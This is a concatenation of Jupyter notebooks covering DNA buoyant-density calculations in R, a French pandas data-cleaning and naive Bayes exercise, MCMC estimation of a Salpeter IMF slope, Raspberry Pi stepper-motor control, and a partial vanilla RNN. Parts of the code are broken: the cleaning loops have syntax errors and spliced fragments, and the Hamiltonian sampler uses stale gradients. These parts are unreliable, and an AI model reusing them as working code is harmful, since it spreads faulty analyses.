#base pair = 665 daltons
#base pair per dry cesium DNA = 665 * 4/3 ~= 882
return(n * 882)
}
M.dryCS = sapply(lens, GC2MW.dryCS)
# BD
GC2BD = function(x){
(x * 0.098) + 1.66
}
rho = sapply(GC, GC2BD)
# sd
calc_s.d = function(p=1.72, L=50000, T=298, B=1.195e9, G=7.87e-10, M=882){
R = 8.3145e7
x = (100 / 0.098)^2 * ((p*R*T)/(B^2*G*L*M))
return(x)
}
# run
p=seq(1.7, 1.75, 0.01)
L=seq(1000, 50000, 1000)
m = outer(p, L, calc_s.d)
rownames(m) = p
colnames(m) = L
%%R
# gas constant
R = 8.3144621e7 #J / mol*K
# temp
T = 273.15 + 23 # 23oC
# rotor speed (rpm)
S = 55000
# beta^o
beta = 1.14 * 10^-9
#beta = 1.195 * 10^-10
# G
G = 7.87 * 10^10 #cgs
# angular velocity
## 2*pi*rpm / 60
omega = 2 * pi * S /60
# GC
GC = seq(0,1,0.1)
# lengths
lens = seq(1000, 100000, 10000)
# molecular weight
GC2MW.dry = function(x){
A = 313.2
T = 304.2
C = 289.2
G = 329.2
GC = G + C
AT = A + T
x*GC + (1-x)*AT
}
#GC2MW = function(x){ x*GC + (1-x)*AT }
M.dry = sapply(GC, GC2MW.dry)
GC2MW.dryCS = function(n){
#n = number of bases
#base pair = 665 daltons
#base pair per dry cesium DNA = 665 * 4/3 ~= 882
return(n * 882)
}
M.dryCS = sapply(lens, GC2MW.dryCS)
# BD
GC2BD = function(x){
(x * 0.098) + 1.66
}
rho = sapply(GC, GC2BD)
# sd
calc_s.d = function(p=1.72, L=50000, T=298, B=1.195e9, G=7.87e-10, M=882){
R = 8.3145e7
x = (100 / 0.098)^2 * ((p*R*T)/(B^2*G*L*M))
return(sqrt(x))
}
# run
p=seq(1.7, 1.75, 0.01)
L=seq(500, 50000, 500)
m = outer(p, L, calc_s.d)
rownames(m) = p
colnames(m) = L
%%R
heatmap(m, Rowv=NA, Colv=NA)
%%R -w 500 -h 350
df = as.data.frame(list('fragment_length'=as.numeric(colnames(m)), 'GC_sd'=m[1,]))
#df$GC_sd = sqrt(df$GC_var)
ggplot(df, aes(fragment_length, GC_sd)) +
geom_line() +
geom_vline(xintercept=4000, linetype='dashed', alpha=0.6) +
labs(x='fragment length (bp)', y='G+C s.d.') +
theme(
text = element_text(size=16)
)
###Output
_____no_output_____
###Markdown
__Notes:__* Small fragment size (<4000 bp) leads to large standard deviations in realized G+C
###Code
%%R
calc_s.d = function(p=1.72, L=50000, T=298, B=1.195e9, G=7.87e-10, M=882){
R = 8.3145e7
sigma_sq = (p*R*T)/(B^2*G*L*M)
return(sqrt(sigma_sq))
}
# run
p=seq(1.7, 1.75, 0.01)
L=seq(500, 50000, 500)
m = outer(p, L, calc_s.d)
rownames(m) = p
colnames(m) = L
head(m)
%%R
heatmap(m, Rowv=NA, Colv=NA)
%%R -w 500 -h 350
BD50 = 0.098 * 0.5 + 1.66
df = as.data.frame(list('fragment_length'=as.numeric(colnames(m)), 'BD_sd'=m[BD50,]))
ggplot(df, aes(fragment_length, BD_sd)) +
geom_line() +
geom_vline(xintercept=4000, linetype='dashed', alpha=0.6) +
labs(x='fragment length (bp)', y='G+C s.d.') +
theme(
text = element_text(size=16)
)
###Output
_____no_output_____ |
ch_cours/Projet_session_APES_PSY4016.ipynb | ###Markdown
Importer les données
###Code
import pandas as pd
df = pd.read_excel(r'C:\Users\Dylan\Desktop\UdeM_H22\PSY4016_traitementDeDonnees\Base_donnees_APES_modifications.xlsx', header = 0)
#df pour manipuler et tester le code plus rapidement
#!!!le df utilisé pour le reste du code est a priori df_short!!!!
df_short = df[['Age', 'Origine', 'IMC', 'Height', 'Sex']]
#Importer la colonne qui décrit le format de chaque variable (nominale, échelle) pour savoir ultérieurement
#si il faut que la colonne soit en string ou en int/float
df_var_descrip = pd.read_excel(r'C:\Users\Dylan\Desktop\Honor\APES\description_variables_col_ACE.xlsx', header = 0)
#df_var_descrip.head()
df.head()
df_short.head()
#faire un pair plot avec des valeurs numériques selon un hue, qui sert de variable
#catégorielle
import seaborn as sns
%matplotlib inline
sns.set()
sns.pairplot(df, hue='Origine', height=2)
###Output
_____no_output_____
###Markdown
Algorithme de prédiction des étiquettes
###Code
import sklearn
import numpy as np
from sklearn import model_selection
from sklearn import naive_bayes
# Étape 1 : choisir classe de modèle et les hyperparameters du modèle
model = naive_bayes.GaussianNB() #créer le modèle
#Étape 2 et 3 : créer les données X et Y (définir les paramètres)
#Isoler la variable catégorielle dans un autre df pour faire des prédictions
X_df = df_short.drop('Origine', axis=1)
y_df = df_short['Origine']
# Étape 4 : adapter le modèle aux données
model.fit(X_df, y_df) #implémente la base de données
#cadre de données = X_iris -> contient les colonnes sepal_length, sepal_width, petal_lengt, petal_width
# il va apprendre les caractéristiques Y_iris -> species.
# Étape 5 : appliquer le modèle
y_model = model.predict(X_df) #prédiction
#ici ERREUR, on voit des erreurs dans la prédiction de l'algorithme -> devrait être 100%.
# problème, nous avons appliqué le modèle sur le même cadre de données...
# On appelle ceci un erreur de généralisation
# il faut l'appliquée sur un nouveau modèle, des nouvelles données!
# Afficher la précision des prédictions
print(f'Prediction accuracy {sklearn.metrics.accuracy_score(y_df, y_model):.2%}')
#print(f'Prediction accuracy {model.metrics.accuracy_score(y_iris, y_model):.2%}')
###Output
_____no_output_____
###Markdown
Missing values et nettoyages des données Pseudocode Section nettoyage des donnéesVoir si le type de chaque colonne est ce qui est attenduSi le type de cellule ne correspond pas à ce qui est attendu, en faire le nettoyage en uniformisantRemplacer les valeurs manquantes par une valeur commune Vérifier que chaque valeurs pour chaque colonne est de format (str, int, float) approprié.
###Code
#Importer les variable sous forme de liste pour y faire référence dans les prochaines étapes
columns = df.columns.values.tolist()
#Boucle qui parcours toutes les cellules du df pour vérifier si le type de la cellule correspond à ce qui est attendue
#Si le type ne correspond pas, il est modifié
###Output
_____no_output_____
###Markdown
Boucle qui parcourt chaque cellule et qui vérifie le type de données dans ces cellules. Si une cellule est un string et qu'il est attendue que cette cellule soit de type int ou float,on veut extraire le float de la cellule en retirant la partie string de la cellule et ainsi modifier la cellule avec la bonne valeur.
###Code
#on retire le premier élément puisque c'est l'ID des participants
#to_rm = columns[0]
#columns.remove(to_rm)
#columns = df.columns.values.tolist().pop(0)
#fonction pour retirer des lettre qui se seraient insérées dans des cellules de type int ou float
#Cette fonction ne prend pas en compte la première colonne d'un dataframe pour la simple raison
#que la première colonne est de type str, car elle contient les id. des participants
##Attention : Cette fonctino ne tient pas compte si il est normal qu'une cellule contienne des lettre**
def clean_str_for_num(data_frame,col_type):
columns = data_frame.columns.values.tolist()
#print(columns)
#Remove de df toutes les colonnes qui sont sensées contenir des strings
#Cela va empêcher de retirer des lettres aux cellules de type nominales ou catégorielles,
#mais seulement les cellules de type continue ou à échelle où des lettres se seraient glissées
#par erreur
#to_remove = columns[0]
#columns.remove(to_remove)
#columns = data_frame.columns.values.tolist().pop(0)
#print(columns)
for col in columns:
compteur = 0
#print(f'la colonne est présentement {col}')
print(col)
type = data_frame[col].dtype
col_type = df_var_descrip['Niveau de mesure']
if type != col_type[compteur]:
print('Ok')
for index in range(len(data_frame)):
#print(data_frame[col])
for i in [data_frame[col][index]]:
cell = i
#print(cell)
##loop qui prend un cellule str et qui donne un int
if type(cell) is str:
temp = cell
for position in cell:
#prend un caractère de string à la position i
#Si le caractère n'est pas un nombre, on retire ce caract
if position.isdigit() is False:
cell = cell.replace(position, ' ')
print(f'La cellule à la colonne {col} et à la ligne {index} était {temp} mais a été changée pour {cell} ' )
#string = float(string)
data_frame.replace(i, cell, inplace = True)
#ploc[index].at[col] = cell
#else:
# print(f'La valeur {cell} est good')
#print(type(cell))
#Boucle pour formater le type de valeur qui est attendue dans une cellule e.g. nominale, échelle
#pour str ou float64. Cela sert à ensuite faire la vérification entre la cellule du df et ce qui est attendu en terme de type
#E.g. si pour l'index 1, on est sensé avoir une valeur nominale, on va encoder str.
for position in range(0,len(df_var_descrip)):
if df_var_descrip.iat[position,0] == 'Nominales':
print(position)
new_cell = 'str'
df_var_descrip.replace(df_var_descrip.iat[position,0], new_cell, inplace = True)
print('le changement a été fait pour un string')
elif df_var_descrip.iat[position,0] == 'Echelle':
new_cell = 'float64'
df_var_descrip.replace(df_var_descrip.iat[position,0], new_cell, inplace = True)
print('le changement a été fait pour un string')
print(df_var_descrip)
#Remove de df toutes les colonnes qui sont sensées contenir des strings
#Cela va empêcher de retirer des lettres aux cellules de type nominales ou catégorielles,
#mais seulemecolumns = data_frame.columns.values.tolist()
#print(columns)
#Remove de df toutes les colonnes qui sont sensées contenir des strings
#Cela va empêcher de retirer des lettres aux cellules de type nominales ou catégorielles,
#mais seulement les cellules de type continue ou à échelle où des lettres se seraient glissées
#par erreur
#to_remove = columns[0]
#columns.remove(to_remove)
#columns = data_frame.columns.values.tolist().pop(0)
#print(columns)
for col in columns:
compteur = 0
#print(f'la colonne est présentement {col}')
print(col)
#type : type de la colonne
type = data_frame[col].dtype
col_type = df_var_descrip['Niveau de mesure']
if type != col_type[compteur]:
print('PAS Ok')
for index in range(len(data_frame)):
#print(data_frame[col])
for i in [data_frame[col][index]]:
cell = i
#print(cell)
##loop qui prend un cellule str et qui donne un int
if type(cell) is str:
temp = cell
for position in cell:
#prend un caractère de string à la position i
#Si le caractère n'est pas un nombre, on retire ce caract
if position.isdigit() is False:
cell = cell.replace(position, ' ')
print(f'La cellule à la colonne {col} et à la ligne {index} était {temp} mais a été changée pour {cell} ' )
#string = float(string)
data_frame.replace(i, cell, inplace = True)
compteur = compteur + 1
#else:
# print(f'La valeur {cell} est good')
#print(type(cell))nt les cellules de type continue ou à échelle où des lettres se seraient glissées
#par erreur
compteur = 0
for col in columns:
for index in range(len(data_frame)):
#type : type de la cellule
type = data_frame[col][index].dtype
#print(data_frame[col])
if type != col_type[compteur]:
print('PAS Ok')
##****rendu ici, reste à comparer si le type de la cell est ce qui est attendu avec la position de la colonne (index de df_var_descrip )
#si ce ne l'est pas --> on va venir appliquer le cleareur de string
#print(f'la colonne est présentement {col}')
print(col)
#type : type de la colonne
type = data_frame[col].dtype
col_type = df_var_descrip['Niveau de mesure']
if type != col_type[compteur]:
print('PAS Ok')
for index in range(len(data_frame)):
#print(data_frame[col])
for i in [data_frame[col][index]]:
cell = i
#print(cell)
##loop qui prend un cellule str et qui donne un int
if type(cell) is str:
temp = cell
for position in cell:
#prend un caractère de string à la position i
#Si le caractère n'est pas un nombre, on retire ce caract
if position.isdigit() is False:
cell = cell.replace(position, ' ')
print(f'La cellule à la colonne {col} et à la ligne {index} était {temp} mais a été changée pour {cell} ' )
#string = float(string)
data_frame.replace(i, cell, inplace = True)
compteur = compteur + 1
#else:
# print(f'La valeur {cell} est good')
#print(type(cell))nt les cellules de type continue ou à échelle où des lettres se seraient glissées
#par erreur
#voir le type de données pour chaque colonne
#puis uniformiser les valeurs manquantes pour qu'elles soient toutes NaN
#Cela permettra par la suite de remplacer ces valeurs par e.g. la moyenne ou la médiane de la colonne
for col in columns:
print(col)
type = df[col].dtype
#type = type(cell)
print(f'Le type de valeur pour la colonne {col} est {type}')
for index in range(0, len(df)):
prev_value = df[col][index]
valeur = df[col][index]
if valeur == ' 'or valeur == '#NULL!' or valeur == 'NaN':
df[col][index] = valeur.replace(valeur, "nan")
print(f'la valeur à la position {col} {index} était {prev_value} a été modifiée pour {df[col][index]}')
for col in columns:
#print(col)
bool = df[col].isnull().values.any()
#type = type(cell)
print(f'La colonne {col} contient au moins un NaN : {bool}')
clean_str_for_num(df)
###Output
_____no_output_____
###Markdown
Afficher toutes les cellules qui contiennent des nan
###Code
import numpy as np
df_na_bool = []
#acquérir une liste de toutes les variables de df_short
ls_col = df_short.columns
print(ls_col)
#vÉRIFIER LES NAN pour une seule col à la fois
for col in columns :
for index in range(0, len(df_short)):
valeur = df_short[col][index]
bool = np.isnan(valeur)
df_na_bool.append(bool)
na_index = pd.DataFrame([i for i, x in enumerate(df_na_bool) if x])
print(f'Le nombre de nan pour cette colonne est {na_index}' )
import numpy as np
df_na_bool = []
#acquérir une liste de toutes les variables de df_short
ls_col = df_short.columns
print(ls_col)
#vÉRIFIER LES NAN pour une seule col à la fois
for index in range(0,len(ls_col['']) :
valeur = df_short['Age'][index]
bool = np.isnan(valeur)
df_na_bool.append(bool)
na_index = pd.DataFrame([i for i, x in enumerate(df_na_bool) if x])
print(f'Le nombre de nan pour cette colonne est {na_index}' )
##MISSING DATA
#visualiser graphiquement si des données sont manquantes
colours = ['#000099', '#ffff00'] # specify the colours - yellow is missing. blue is not missing.
sns.heatmap(df.isnull(), cmap=sns.color_palette(colours))
#pourcentage de données manquantes dans le df
for col in df_short.columns:
pct_missing = np.mean(df_short[col].isnull())
print('{} - {}%'.format(col, round(pct_missing*100)))
#Remplacer les valeurs manquantes par la moyenne ou la médiane
##ATTENION ICI DF_SHORT A ÉTÉ MODIFÉ
#POUR CONSERVER LA DF ORIGINALE, IL VAUT MIEUX FAIRE UNE COPIE
mediane = df_short['IMC'].median()
print(mediane)
df_short['IMC'] = df['IMC'].fillna(mediane)
###Output
_____no_output_____
###Markdown
Validation croisée (cross-validation) / Entrainement / test
###Code
#Extraction de deux groupes de données pour l'entrainement
Xtrain = X_df [:-25]
Xtest = X_df [-25:]
ytrain = y_df [:-25]
ytest = y_df [-25:]
# 1. choisir la classe de modèle
# from sklearn.naive_bayes import GaussianNB
# 2. choisir les hyperparameters du modèle
model = naive_bayes.GaussianNB()
#ici même chose que vue plus bas
#composantes = ecomposition.PCA(n_components=2
#model = naive_bayes.GaussianNB().fit(composantes, ytrain)
#unscaled_clf = pipeline.make_pipeline(
# decomposition.PCA(n_components=2),
# naive_bayes.GaussianNB())
# 3. arranger les données
# from sklearn.model_selection import train_test_split
#créer deux cadres de données
#train = entrainement de la création du modèle
#
Xtrain, Xtest, ytrain, ytest = model_selection.train_test_split(
X_df, y_df,
random_state=1)
#on créer un cadre de données
# radom_state=1 -> permet de reproduire le même cadre de données
# chaque fois qu'on implémente selection.train_test_split -> ça va créer un nouveau cadre de données
# 4. adapter le modèle aux données
model.fit(Xtrain, ytrain)
#pour créer les règles = ytrain, il faut que ça soit appliqué sur notre cadre de données = Xtrain
# 5. appliquer le modèle à de nouvelles données
y_model = model.predict(Xtest)
#y_model va être prédit à partir du Xtest, et non le Xtrain
#permet de faire une prédiction sur un nouveau cadre de données, sinon erreur de généralisation
# Utilisez l'utilitaire accuracy_score
# pour afficher la fraction d'étiquettes prédites correspondant à leur valeur réelle:
sklearn.metrics.accuracy_score(ytest, y_model)
#fait le comparaison entre y test(qui doit être prédit) et le y_model qui était prédit.
# réussit à faire seulement 3 % d'erreur
# y_model réussit de prédire 97% des valeurs
###Output
_____no_output_____
###Markdown
pas certain de cette section * utilise pas les données
###Code
import matplotlib.pyplot as plt
import seaborn as sns
import sklearn
import numpy as np
RANDOM_STATE = 42
FIG_SIZE = (10, 7)
#features, target = sklearn.datasets.load_wine(return_X_y=True)
from sklearn import datasets
features, target = datasets.load_wine(return_X_y=True)
from sklearn import model_selection
X_train, X_test, y_train, y_test =model_selection.train_test_split(features, target,
test_size=0.30,
random_state=RANDOM_STATE)
# Ajuster aux données et prédire à l'aide de GNB et l'ACP en pipeline (extraction des composantes).
# pour les données non mises à l'échelle
from sklearn import pipeline
from sklearn import decomposition
from sklearn import naive_bayes
# unscaled_clf = sklearn.pipeline.make_pipeline(decomposition.PCA(n_components=2), naive_bayes.GaussianNB())
unscaled_clf = pipeline.make_pipeline(
decomposition.PCA(n_components=2), #calcul les deux composantes les plus importantes
naive_bayes.GaussianNB()) # permet de faire la prédiction
unscaled_clf.fit(X_train, y_train) # prend les données de X_train et y_train
pred_test = unscaled_clf.predict(X_test)
# pour les données mises à l'échelle
# std_clf = sklearn.pipeline.make_pipeline(preprocessing.StandardScaler(), decomposition.PCA(n_components=2), naive_bayes.GaussianNB())
std_clf = pipeline.make_pipeline(sklearn.preprocessing.StandardScaler(), #ajouter la standardisation
decomposition.PCA(n_components=2),
naive_bayes.GaussianNB())
std_clf.fit(X_train, y_train) #le fit
pred_test_std = std_clf.predict(X_test) # la prédiction
pred_test_std
# Extraire l'ACP du pipeline
pca = unscaled_clf.named_steps['pca']
pca_std = std_clf.named_steps['pca']
# Utiliser l'ACP sans et avec échelle sur les données X_train
# pour la visualisation.
X_train_transformed = pca.transform(X_train)
scaler = std_clf.named_steps['standardscaler']
X_train_std_transformed = pca_std.transform(scaler.transform(X_train))
# visualiser un ensemble de données standardisé
# ou non standardisé avec l'ACP effectuée
fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=FIG_SIZE)
for l, c, m in zip(range(0, 3), ('blue', 'red', 'green'), ('^', 's', 'o')):
ax1.scatter(X_train_transformed[y_train == l, 0],
X_train_transformed[y_train == l, 1],
color=c,
label='groupe %s' % l,
alpha=0.5,
marker=m
)
for l, c, m in zip(range(0, 3), ('blue', 'red', 'green'), ('^', 's', 'o')):
ax2.scatter(X_train_std_transformed[y_train == l, 0],
X_train_std_transformed[y_train == l, 1],
color=c,
label='groupe %s' % l,
alpha=0.5,
marker=m
)
ax1.set_title('données d\'entraînement NON standardisé après l\'ACP')
ax2.set_title('données d\'entraînement standardisé après l\'ACP')
for ax in (ax1, ax2):
ax.set_xlabel('1er composante principale')
ax.set_ylabel('2e composante principale')
ax.legend(loc='upper right')
ax.grid()
plt.tight_layout()
plt.show()
#Exercice : essayer d'implémenter la courbe ROC sur df_short
df_short.target
###Output
_____no_output_____ |
imf.ipynb | ###Markdown
Stellar Initial Mass Function (IMF)We are going to use a Salpeter IMF to generate stellar IMF data and then use MCMC to guess the slope.The Salpeter IMF is given by:$\frac{dN}{dM} \propto \frac{M}{M_\odot}^{-\alpha} ~~ or ~~ \frac{dN}{dlogM} \propto \frac{M}{M_\odot}^{1-\alpha}$
###Code
import numpy as np
import matplotlib.pyplot as plt
import copy
import corner
import emcee
%matplotlib inline
def sampleFromSalpeter(N,alpha,M_min,M_max):
# Draw random samples from a Salpeter IMF.
# N ... number of samples.
# alpha ... power-law index.
# M_min ... lower bound of mass interval.
# M_max ... upper bound of mass interval.
# Convert limits from M to logM.
log_M_Min = np.log(M_min)
log_M_Max = np.log(M_max)
# Since Salpeter SMF has a negative slope the maximum likelihood occurs at M_min
maxlik = M_min**(1.0 - alpha)
# Prepare array for output masses.
Masses = []
# Fill in array.
while (len(Masses) < N):
# Draw a candidate from logM interval.
logM = np.random.uniform(log_M_Min,log_M_Max)
M = np.exp(logM)
# Compute likelihood of candidate from Salpeter SMF.
likelihood = M**(1.0 - alpha)
# Accept randomly.
u = np.random.uniform(0.0,maxlik)
if (u < likelihood):
Masses.append(M)
return Masses
# and now generate the data
N = 1000000 # Draw 1 Million stellar masses.
alpha = 2.35
M_min = 1.0
M_max = 100.0
log_M_min = np.log10(M_min)
log_M_max = np.log10(M_max)
Masses = sampleFromSalpeter(N, alpha, M_min, M_max)
LogM = np.log(np.array(Masses))
D = np.mean(LogM)*N
###Output
_____no_output_____
###Markdown
Here we have created a set of test stellar mass data, distributed according to the Salpeter IMF, and now we will perform a MCMC to guess the slope. We are given then a set of N-stellar masses, with negligible errors in the measurements.Assuming that the minimum and maximum masses are known, the likelihood of the problem is: $\mathcal L(\{M_1,M_2,\ldots,M_N\};\alpha) = \prod_{n=1}^N p(M_n|\alpha) = \prod_{n=1}^N c\left(\frac{M_n}{M_\odot}\right)^{-\alpha}$where the normalization constant c can be found by:$\int_{M_{min}}^{M_{max}}c M^{-\alpha} dM = 1 \Rightarrow c\frac{M_{max}^{1-\alpha}-M_{min}^{1-\alpha}}{1-\alpha}=1$ 1) EMCEE MCMC
###Code
def ln_likelihood(params, D, N, M_min, M_max):
# Define logarithmic likelihood function.
# params ... array of fit params, here just alpha
# D ... sum over log(M_n)
# N ... number of data points.
# M_min ... lower limit of mass interval
# M_max ... upper limit of mass interval
alpha = params[0] # extract alpha
# Compute normalisation constant.
c = (1.0 - alpha)/(M_max**(1.0-alpha)
- M_min**(1.0-alpha))
# return log likelihood.
return N*np.log(c) - alpha*D
def ln_prior(params):
return 0.0
def ln_posterior(params, D, N, M_min, M_max):
lp = ln_prior(params)
ll = ln_likelihood(params, D, N, M_min, M_max)
return lp+ll
# Running the MCMC
nwalkers, ndim = 100, 50
# The array of initial guess
initial = np.array([3.0])
p0 = [np.random.rand(ndim) for i in range(nwalkers)]
sampler = emcee.EnsembleSampler(nwalkers, ndim, ln_posterior, args=(D, N, M_min, M_max))
pos, prob, state = sampler.run_mcmc(p0, 1000)
# Plot the trace
fig, ax = plt.subplots(1,1, figsize=(4,4))
# Plot trace
for j in range(nwalkers):
ax.plot(sampler.chain[j,:,0], alpha=0.1, color='k')
plt.ylim(2.2,2.4)
plt.show()
print('The alpha is',pos[0,0])
# # Reset the sampler, restart the sampler at this current position,
# # which we saved from before and called "pos"
# sampler.reset()
# pos,prob,state = sampler.run_mcmc(pos,1000)
# corner.corner(sampler.flatchain)
# plt.show()
###Output
_____no_output_____
###Markdown
2) We will give an example using the Metropolis-Hastings MCMC.
###Code
# initial guess for alpha as a list.
guess = [3.0]
# Prepare storing MCMC chain as list of lists.
A = [guess]
# define stepsize of MCMC.
stepsizes = [0.0005] # list of stepsizes
accepted = 0.0
# Metropolis-Hastings with 10,000 iterations.
for n in range(10000):
old_alpha = A[len(A)-1] # old parameter value as array
old_loglik = ln_likelihood(old_alpha, D, N, M_min,M_max)
# Suggest new candidate from Gaussian proposal distribution.
new_alpha = np.zeros([len(old_alpha)])
for i in range(len(old_alpha)):
# Use stepsize provided for every dimension.
new_alpha[i] = np.random.normal(old_alpha[i], stepsizes[i])
new_loglik = ln_likelihood(new_alpha, D, N, M_min,M_max)
# Accept new candidate in Monte-Carlo fashing.
if (new_loglik > old_loglik):
A.append(new_alpha)
accepted = accepted + 1.0 # monitor acceptance
else:
u = np.random.uniform(0.0,1.0)
if (u < np.exp(new_loglik - old_loglik)):
A.append(new_alpha)
accepted = accepted + 1.0 # monitor acceptance
else:
A.append(old_alpha)
print("Acceptance rate = "+str(accepted/10000.0))
# Discard first half of MCMC chain and thin out the rest.
Clean = []
for n in range(5000,10000):
if (n % 10 == 0):
Clean.append(A[n][0])
# Print Monte-Carlo estimate of alpha.
print("Mean: "+str(np.mean(Clean)))
print("Sigma: "+str(np.std(Clean)))
plt.figure(1)
plt.hist(Clean, 30, histtype='step', lw=2)
plt.xticks([2.346,2.348,2.35,2.352,2.354],
[2.346,2.348,2.35,2.352,2.354])
plt.xlim(2.345,2.355)
plt.xlabel(r'$\alpha$', fontsize=16)
plt.ylabel(r'$\cal L($Data$;\alpha)$', fontsize=16)
plt.show()
###Output
_____no_output_____
###Markdown
3) We will now perform the same procedure with Hamiltonian dynamics
###Code
def evaluateGradient(params, D, N, M_min, M_max, logMmin, logMmax):
alpha = params[0] # extract alpha
grad = logMmin*M_min**(1.0-alpha) - logMmax*M_max**(1.0-alpha)
grad = 1.0 + grad*(1.0 - alpha)/(M_max**(1.0-alpha)
- M_min**(1.0-alpha))
grad = -D - N*grad/(1.0 - alpha)
return np.array(grad)
guess = [3.0]
A = [guess]
# define stepsize of HMC.
stepsize = 0.00004
accepted = 0.0
# Hamiltonian Monte-Carlo.
for n in range(50000):
old_alpha = A[len(A)-1]
# Remember, energy = -loglik
old_energy = - ln_likelihood(old_alpha, D, N, M_min, M_max)
old_grad = - evaluateGradient(old_alpha, D, N, M_min, M_max, log_M_min, log_M_max)
new_alpha = copy.copy(old_alpha) # deep copy of array
new_grad = copy.copy(old_grad) # deep copy of array
# Suggest new candidate using gradient + Hamiltonian dynamics.
# draw random momentum vector from unit Gaussian.
p = np.random.normal(0.0, 1.0)
H = np.dot(p,p)/2.0 + old_energy # compute Hamiltonian
# Do 5 Leapfrog steps.
for tau in range(5):
# make half step in p
p = p - stepsize*new_grad/2.0
# make full step in alpha
new_alpha = new_alpha + stepsize*p
# compute new gradient
new_grad = - evaluateGradient(old_alpha, D, N, M_min,
M_max, log_M_min, log_M_max)
# make half step in p
p = p - stepsize*new_grad/2.0
# Compute new Hamiltonian. Remember, energy = -loglik.
new_energy = - ln_likelihood(new_alpha, D, N, M_min,
M_max)
new_grad = - evaluateGradient(old_alpha,D, N, M_min,
M_max, log_M_min, log_M_max)
newH = np.dot(p,p)/2.0 + new_energy
dH = newH - H
# Accept new candidate in Monte-Carlo fashion.
if (dH < 0.0):
A.append(new_alpha)
accepted = accepted + 1.0
else:
u = np.random.uniform(0.0,1.0)
if (u < np.exp(-dH)):
A.append(new_alpha)
accepted = accepted + 1.0
else:
A.append(old_alpha)
print("Acceptance rate = "+str(accepted/float(len(A))))
# Discard first half of MCMC chain and thin out the rest.
Clean = []
for n in range(len(A)//2,len(A)):
if (n % 10 == 0):
Clean.append(A[n][0])
# Print Monte-Carlo estimate of alpha.
print("Mean: "+str(np.mean(Clean)))
print("Sigma: "+str(np.std(Clean)))
plt.figure(1)
plt.hist(Clean, 30, histtype='step', lw=2)
#plt.xlim(2.3,2.358)
plt.xlabel(r'$\alpha$', fontsize=16)
plt.ylabel(r'$\cal L($Data$;\alpha)$', fontsize=16)
plt.show()
###Output
_____no_output_____ |
31_motor_control_intro.ipynb | ###Markdown
Simple Motor Control **Note: The wiring for this is very important. Please double-check your connections before proceeding.**
###Code
# Import GPIO Libraries
import RPi.GPIO as GPIO
import time
###Output
_____no_output_____
###Markdown
The pin configuration is dependent on the motor and wiring setup. The following code works for my current wiring setup with two motors and controllers (12V stepper motors and L293D H-Bridge driven with an 8 AA battery pack)
###Code
GPIO.setmode(GPIO.BCM)
coil_A_1_pin = 4
coil_A_2_pin = 5
coil_B_1_pin = 20
coil_B_2_pin = 21
GPIO.setup(coil_A_1_pin, GPIO.OUT)
GPIO.setup(coil_A_2_pin, GPIO.OUT)
GPIO.setup(coil_B_1_pin, GPIO.OUT)
GPIO.setup(coil_B_2_pin, GPIO.OUT)
reverse_seq = ['1010', '0110', '0101', '1001']
reverse_seq = [ '0101', '0110','1010', '1001']
#reverse_seq = [ '1000','0010', '0100', '0001']
#reverse_seq = ['1100', '1010', '0110', '0101', '0011', '1010', '1001', '0101']
forward_seq = list(reverse_seq) # to copy the list
forward_seq.reverse()
forward_seq
def motor_forward(delay, steps):
for i in range(steps):
for step in forward_seq:
motor_set_step(step)
time.sleep(delay)
def motor_backwards(delay, steps):
for i in range(steps):
for step in reverse_seq:
motor_set_step(step)
time.sleep(delay)
def motor_set_step(step):
GPIO.output(coil_A_1_pin, step[0] == '1')
GPIO.output(coil_A_2_pin, step[1] == '1')
GPIO.output(coil_B_1_pin, step[2] == '1')
GPIO.output(coil_B_2_pin, step[3] == '1')
motor_set_step('0000')
delay = 5 # Time Delay (ms)
steps = 50
motor_forward(int(delay) / 1000.0, int(steps))
motor_backwards(int(delay) / 1000.0, int(steps))
# release the motor from a 'hold' position
motor_set_step('0000')
GPIO.cleanup()
###Output
_____no_output_____ |
vanilla-char-rnn.ipynb | ###Markdown
Vanilla Recurrent Neural NetworkCharacter level implementation of vanilla recurrent neural network Import dependencies
###Code
import numpy as np
import matplotlib.pyplot as plt
###Output
_____no_output_____
###Markdown
Parameters Initialization
###Code
def initialize_parameters(hidden_size, vocab_size):
'''
Returns:
parameters -- a tuple of network parameters
adagrad_mem_vars -- a tuple of mem variables required for adagrad update
'''
Wxh = np.random.randn(hidden_size, vocab_size) * 0.01
Whh = np.random.randn(hidden_size, hidden_size) * 0.01
Why = np.random.randn(vocab_size, hidden_size) * 0.01
bh = np.zeros([hidden_size, 1])
by = np.zeros([vocab_size, 1])
mWxh, mWhh, mWhy = np.zeros_like(Wxh), np.zeros_like(Whh), np.zeros_like(Why)
mbh, mby = np.zeros_like(bh), np.zeros_like(by) # memory variables for Adagrad
parameter = (Wxh, Whh, Why, bh, by)
adagrad_mem_vars = (mWxh, mWhh, mWhy, mbh, mby)
return (parameter, adagrad_mem_vars)
###Output
_____no_output_____
###Markdown
Forward Propogation
###Code
def softmax(X):
t = np.exp(X)
return t / np.sum(t, axis=0)
def forward_propogation(X, parameters, seq_length, hprev):
'''
Implement the forward propogation in the network
Arguments:
X -- input to the network
parameters -- a tuple containing weights and biases of the network
seq_length -- length of sequence of input
hprev -- previous hidden state
Returns:
caches -- tuple of activations and hidden states for each step of forward prop
'''
caches = {}
caches['h0'] = np.copy(hprev)
Wxh, Whh, Why, bh, by = parameters
for i in range(seq_length):
x = X[i].reshape(vocab_size, 1)
ht = np.tanh(np.dot(Whh, caches['h' + str(i)]) + np.dot(Wxh, x) + bh)
Z = np.dot(Why, ht) + by
A = softmax(Z)
caches['A' + str(i+1)] = A
caches['h' + str(i+1)] = ht
return caches
###Output
_____no_output_____
###Markdown
Cost Computation
###Code
def compute_cost(Y, caches):
"""
Implement the cost function for the network
Arguments:
Y -- true "label" vector, shape (vocab_size, number of examples)
caches -- tuple of activations and hidden states for each step of forward prop
Returns:
cost -- cross-entropy cost
"""
seq_length = len(caches) // 2
cost = 0
for i in range(seq_length):
y = Y[i].reshape(vocab_size, 1)
cost += - np.sum(y * np.log(caches['A' + str(i+1)]))
return np.squeeze(cost)
###Output
_____no_output_____
###Markdown
Backward Propogation
###Code
def backward_propogation(X, Y, caches, parameters):
'''
Implement Backpropogation
Arguments:
Al -- Activations of last layer
Y -- True labels of data
caches -- tuple containing values of `A` and `h` for each char in forward prop
parameters -- tuple containing parameters of the network
Returns
grads -- tuple containing gradients of the network parameters
'''
Wxh, Whh, Why, bh, by = parameters
dWhh, dWxh, dWhy = np.zeros_like(Whh), np.zeros_like(Wxh), np.zeros_like(Why)
dbh, dby = np.zeros_like(bh), np.zeros_like(by)
dhnext = np.zeros_like(caches['h0'])
